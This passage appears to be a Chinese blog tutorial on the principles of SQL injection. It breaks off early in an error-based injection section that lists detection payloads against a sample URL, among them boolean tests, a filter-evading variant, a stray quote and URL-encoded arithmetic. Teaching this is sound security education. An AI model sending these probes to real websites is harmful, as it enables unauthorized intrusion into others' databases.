SQL注入的原理

一、SQL注入的本质

注入攻击的本质,是把用户输入的数据当做代码执行。

SQL:结构化查询语言,即操作数据库的代码
注入:把用户输入的数据当做代码执行

SQL注入的条件:
第一个是用户能够控制输入。
第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行

SQL注入的应用场景:
任何和数据库交互的传参(任何传参点)

想要了解更详细一点,可以看一下这篇博客:SQl注入与正则表达式

二、显错注入

1、判断是否存在注入点

http://59.1.1.1/?id=1
#?代表GET传参,传参值为1
1#当1=1正确而1=2错误时,有可能存在SQL注入
http://59.1.1.1/?id=1 and 1=1
http://59.1.1.1/?id=1 and 1=2

#and 1=1 and 1=2被拦截的几率太高了,可以尝试其它
http://59.1.1.1/?id=1 and -1=-1
http://59.1.1.1/?id=1 and -1=-2
2#URL后面加',看是否报错
http://59.1.1.1/?id=1'
3)加减乘除
#注意URL栏经过URL编码,会把空格编码为+,+会被理解为空格,如果要使用+,需要进行编码,即%2b
http://59.1.1.1/?id=1%2b1
http://59.1.1.1/?id=2-1
http:
  • 4
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

弈-剑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值